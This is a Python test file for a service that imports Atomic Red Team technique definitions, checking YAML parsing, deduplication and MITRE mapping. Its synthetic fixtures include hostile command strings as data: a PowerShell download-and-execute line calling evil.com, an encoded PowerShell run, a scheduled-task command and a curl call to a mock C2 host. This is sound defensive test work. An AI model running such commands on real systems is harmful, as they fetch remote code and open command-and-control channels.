"""Validation tests for T-108: Atomic Red Team Import Service. Tests the YAML parsing logic and deduplication using synthetic data. The download test is marked as optional (requires network). """ import sys import os import uuid import tempfile import shutil from unittest.mock import MagicMock, patch, PropertyMock from types import ModuleType from pathlib import Path # --------------------------------------------------------------------------- # Stub heavy dependencies # --------------------------------------------------------------------------- backend_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), "..")) if backend_dir not in sys.path: sys.path.insert(0, backend_dir) if "pydantic_settings" not in sys.modules: pydantic_settings_mock = ModuleType("pydantic_settings") class _BaseSettings: def __init__(self, **kwargs): pass def __init_subclass__(cls, **kwargs): super().__init_subclass__(**kwargs) pydantic_settings_mock.BaseSettings = _BaseSettings sys.modules["pydantic_settings"] = pydantic_settings_mock if "app.config" not in sys.modules: config_mod = ModuleType("app.config") class _FakeSettings: DATABASE_URL = "sqlite:///:memory:" SECRET_KEY = "test" ALGORITHM = "HS256" ACCESS_TOKEN_EXPIRE_MINUTES = 60 MINIO_ENDPOINT = "localhost:9000" MINIO_ACCESS_KEY = "test" MINIO_SECRET_KEY = "test" MINIO_BUCKET = "test" config_mod.settings = _FakeSettings() sys.modules["app.config"] = config_mod if "app.database" not in sys.modules: db_mod = ModuleType("app.database") db_mod.Base = type("Base", (), {"metadata": MagicMock()}) db_mod.get_db = MagicMock() sys.modules["app.database"] = db_mod if "taxii2client" not in sys.modules: sys.modules["taxii2client"] = ModuleType("taxii2client") taxii_v20 = ModuleType("taxii2client.v20") taxii_v20.Server = MagicMock sys.modules["taxii2client.v20"] = taxii_v20 if "jose" not in sys.modules: jose_mod = ModuleType("jose") jose_mod.JWTError = Exception jose_mod.jwt = MagicMock() sys.modules["jose"] = jose_mod if "boto3" not in sys.modules: boto3_mod = ModuleType("boto3") boto3_mod.client = MagicMock() sys.modules["boto3"] = boto3_mod sys.modules["botocore"] = ModuleType("botocore") sys.modules["botocore.exceptions"] = ModuleType("botocore.exceptions") sys.modules["botocore.exceptions"].ClientError = Exception if "apscheduler" not in sys.modules: sys.modules["apscheduler"] = ModuleType("apscheduler") sys.modules["apscheduler.schedulers"] = ModuleType("apscheduler.schedulers") sys.modules["apscheduler.schedulers.background"] = ModuleType("apscheduler.schedulers.background") sys.modules["apscheduler.schedulers.background"].BackgroundScheduler = MagicMock sys.modules["apscheduler.triggers"] = ModuleType("apscheduler.triggers") sys.modules["apscheduler.triggers.cron"] = ModuleType("apscheduler.triggers.cron") sys.modules["apscheduler.triggers.cron"].CronTrigger = MagicMock # --------------------------------------------------------------------------- # Imports # --------------------------------------------------------------------------- import yaml from app.services.atomic_import_service import ( _parse_yaml_files, _extract_zip, import_atomic_red_team, ATOMIC_RT_ZIP_URL, ) # --------------------------------------------------------------------------- # Helpers — create a synthetic atomics directory # --------------------------------------------------------------------------- def _create_fake_atomics(tmp_dir: str, techniques: dict[str, list[dict]]) -> Path: """Create a fake atomics/ directory with YAML files. Parameters ---------- techniques : dict Mapping from technique ID (e.g. "T1059.001") to a list of test dicts. """ atomics = Path(tmp_dir) / "atomics" atomics.mkdir(parents=True, exist_ok=True) for tech_id, tests in techniques.items(): tech_dir = atomics / tech_id tech_dir.mkdir(exist_ok=True) yaml_data = { "attack_technique": tech_id, "display_name": f"Technique {tech_id}", "atomic_tests": tests, } yaml_path = tech_dir / f"{tech_id}.yaml" with open(yaml_path, "w", encoding="utf-8") as fh: yaml.dump(yaml_data, fh) return atomics # --------------------------------------------------------------------------- # 1. Parsing creates correct TestTemplate-like dicts # --------------------------------------------------------------------------- def test_parse_creates_templates(): tmp_dir = tempfile.mkdtemp(prefix="aegis_test_") try: atomics = _create_fake_atomics(tmp_dir, { "T1059.001": [ { "name": "PowerShell Invoke-Expression", "description": "Runs a PS command", "supported_platforms": ["windows"], "executor": { "name": "powershell", "command": "IEX (New-Object Net.WebClient).DownloadString('http://evil.com')", }, }, { "name": "PowerShell Base64 Encoded", "description": "Runs base64-encoded PS", "supported_platforms": ["windows"], "executor": { "name": "powershell", "command": "powershell -enc ZQBjaA==", }, }, ], "T1053.005": [ { "name": "Scheduled Task Creation", "description": "Creates a scheduled task", "supported_platforms": ["windows", "linux"], "executor": { "name": "command_prompt", "command": "schtasks /create /tn test /tr calc.exe", }, }, ], }) results = _parse_yaml_files(atomics) assert len(results) == 3, f"Expected 3 tests, got {len(results)}" # Verify atomic_test_id format ids = {r["atomic_test_id"] for r in results} assert "T1059.001-0" in ids assert "T1059.001-1" in ids assert "T1053.005-0" in ids # Check source is "atomic_red_team" (via source_url) for r in results: assert "atomic-red-team" in r["source_url"] # Check platforms for r in results: if r["technique_id"] == "T1053.005": assert "windows" in r["platforms"] assert "linux" in r["platforms"] print(" [PASS] Parsing creates correct templates with source and valid data") finally: shutil.rmtree(tmp_dir, ignore_errors=True) # --------------------------------------------------------------------------- # 2. Running twice does not duplicate # --------------------------------------------------------------------------- @patch("app.services.atomic_import_service.TestTemplate") @patch("app.services.atomic_import_service.log_action") @patch("app.services.atomic_import_service._download_zip") def test_no_duplicates(mock_download, mock_log, MockTestTemplate): """Import twice with same data — second run should skip everything.""" import io import zipfile # Make TestTemplate() return a mock each time MockTestTemplate.side_effect = lambda **kwargs: MagicMock(**kwargs) # Keep atomic_test_id queryable MockTestTemplate.atomic_test_id = MagicMock() MockTestTemplate.atomic_test_id.isnot = MagicMock(return_value=True) # Build a fake ZIP tmp_dir = tempfile.mkdtemp(prefix="aegis_test_zip_") try: atomics = _create_fake_atomics( os.path.join(tmp_dir, "atomic-red-team-master"), { "T1059.001": [ { "name": "Test One", "description": "Desc", "supported_platforms": ["windows"], "executor": {"name": "sh", "command": "echo test"}, }, ], }, ) # Create a ZIP from the tmp_dir zip_buffer = io.BytesIO() with zipfile.ZipFile(zip_buffer, "w") as zf: root = Path(tmp_dir) for file_path in root.rglob("*"): if file_path.is_file(): arcname = str(file_path.relative_to(root)) zf.write(file_path, arcname) zip_bytes = zip_buffer.getvalue() mock_download.return_value = zip_bytes # --- First import --- # Mock DB: no existing templates db = MagicMock() mock_query = MagicMock() mock_query.filter.return_value.all.return_value = [] db.query.return_value = mock_query added_templates = [] def track_add(template): added_templates.append(template) db.add.side_effect = track_add result1 = import_atomic_red_team(db) assert result1["created"] == 1 assert result1["skipped_existing"] == 0 # --- Second import --- # Now DB returns the existing template db2 = MagicMock() mock_query2 = MagicMock() # Return the atomic_test_id that was already created mock_query2.filter.return_value.all.return_value = [("T1059.001-0",)] db2.query.return_value = mock_query2 added2 = [] db2.add.side_effect = lambda t: added2.append(t) result2 = import_atomic_red_team(db2) assert result2["created"] == 0 assert result2["skipped_existing"] == 1 assert len(added2) == 0 print(" [PASS] Running twice does not duplicate templates") finally: shutil.rmtree(tmp_dir, ignore_errors=True) # --------------------------------------------------------------------------- # 3. Templates mapped correctly to MITRE techniques # --------------------------------------------------------------------------- def test_templates_mapped_to_techniques(): tmp_dir = tempfile.mkdtemp(prefix="aegis_test_") try: atomics = _create_fake_atomics(tmp_dir, { "T1059.001": [ { "name": "Test", "description": "Desc", "supported_platforms": ["windows"], "executor": {"name": "sh", "command": "echo hi"}, }, ], "T1071.001": [ { "name": "HTTP C2", "description": "HTTP-based C2", "supported_platforms": ["linux"], "executor": {"name": "bash", "command": "curl http://c2.evil"}, }, ], }) results = _parse_yaml_files(atomics) technique_ids = {r["technique_id"] for r in results} assert "T1059.001" in technique_ids assert "T1071.001" in technique_ids for r in results: assert r["technique_id"].startswith("T") print(" [PASS] Templates mapped correctly to MITRE techniques") finally: shutil.rmtree(tmp_dir, ignore_errors=True) # --------------------------------------------------------------------------- # 4. Service module structure is correct # --------------------------------------------------------------------------- def test_service_module_structure(): """Verify the service has all expected public functions.""" from app.services import atomic_import_service as svc assert hasattr(svc, "import_atomic_red_team") assert callable(svc.import_atomic_red_team) assert hasattr(svc, "ATOMIC_RT_ZIP_URL") assert "github.com" in svc.ATOMIC_RT_ZIP_URL print(" [PASS] Service module has correct structure") # --------------------------------------------------------------------------- # 5. ZIP URL is correct (no rate-limit concern with ZIP download) # --------------------------------------------------------------------------- def test_zip_url_no_rate_limit(): """The URL should be a direct ZIP download, not an API endpoint.""" assert "/archive/" in ATOMIC_RT_ZIP_URL assert "api.github.com" not in ATOMIC_RT_ZIP_URL print(" [PASS] ZIP download URL avoids API rate limits") # --------------------------------------------------------------------------- # Run all # --------------------------------------------------------------------------- if __name__ == "__main__": print("T-108 Validation: Atomic Red Team Import Service") print("=" * 55) test_parse_creates_templates() test_no_duplicates() test_templates_mapped_to_techniques() test_service_module_structure() test_zip_url_no_rate_limit() print("=" * 55) print("ALL T-108 validations PASSED!")